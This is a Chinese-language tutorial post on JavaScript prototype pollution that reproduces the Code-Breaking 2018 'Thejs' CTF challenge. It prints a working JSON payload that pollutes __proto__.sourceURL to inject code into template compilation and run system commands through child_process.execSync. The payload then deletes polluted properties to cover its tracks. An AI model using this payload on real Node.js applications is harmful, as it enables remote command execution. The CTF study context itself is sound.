原型链污染

一 原型链污染原理

prototype是一个类的属性,所有类对象在实例化的时候将会拥有prototype中的属性和方法

一个对象的__proto__属性,指向这个对象所在的类的prototype属性

例如 foo.__proto__指向的是Foo类的prototype。那么,如果我们修改了foo.__proto__中的值,意味着就可以修改Foo类

二,简单的原型链污染实验

foo是一个简单的JavaScript对象

foo.bar 此时为1

由于查找顺序的原因,foo.bar仍然是1

此时再用Object创建一个空的zoo对象

查看zoo.bar

查看结果

分析

三, Code-Breaking 2018 Thejs原型链污染复现

1,运用的知识点

2,原理分析 //...merge 给sourceURL赋值 实现任意命令执行 通过原型链污染实现//

//...new Function(x, 'return y') 相当于function add(x){ return }//

复制代码
{"__proto__": {"sourceURL": "\u000areturn ()=>{for (var a in {}) {delete Object.prototype[a];} 
return global.process.mainModule.constructor._load('child_process').execSync('id')}\u000a//"}

//nodejs中有一个模块叫做process process底下有一个子模块叫chid_process

,其下有一个方法叫做execSync('whoami')执行命令//

return global.process.mainModule.constructor._load('child_process').execSync('id')}\u000a//"}}

让原来的return失效,新的return把它替换掉 通过\u000a换行符把return换下来,再注释掉

{"proto": {"sourceURL": "\u000areturn ()=>{for (var a in {})

{delete Object.prototype[a];} 干什么?为了不让其他人看见这个flag,所以我把这个flag删除了

//{delete Object.prototype[a];}将object对象中的所有属性循环出来,再进行删除

三,复现

相关推荐
方见华Richard13 小时前
世毫九:思维是意义空间的几何运动的详细推导过程
人工智能·交互·学习方法·原型模式·空间计算
方见华Richard13 小时前
世毫九认知几何学公式推导过程(严格数学构造)
人工智能·交互·学习方法·原型模式·空间计算
方见华Richard14 小时前
《认知几何学:思维如何弯曲意义空间》补充材料
人工智能·经验分享·交互·原型模式·空间计算
方见华Richard2 天前
整数阶时间重参数化:基于自适应豪斯多夫维数的偏微分方程正则化新框架
人工智能·笔记·交互·原型模式·空间计算
方见华Richard4 天前
世毫九《认知几何学修订版:从离散概念网络到认知拓扑动力学》
人工智能·经验分享·交互·原型模式·空间计算
方见华Richard4 天前
自指系统的安全本体论:论内生安全性的哲学基础与形式化路径
人工智能·经验分享·交互·学习方法·原型模式
xianyinsuifeng4 天前
RAG + Code Analysis 的标准路线
数据仓库·自动化·云计算·原型模式·aws
Beginner x_u6 天前
JavaScript 原型、原型链与原型继承的核心机制解析
开发语言·javascript·原型模式·原型原型链
方见华Richard7 天前
递归对抗引擎(RAE)核心极简实现框架
人工智能·交互·学习方法·原型模式·空间计算
方见华Richard7 天前
递归对抗引擎RAE V2.0(多智能体分布式对抗版)
人工智能·经验分享·交互·学习方法·原型模式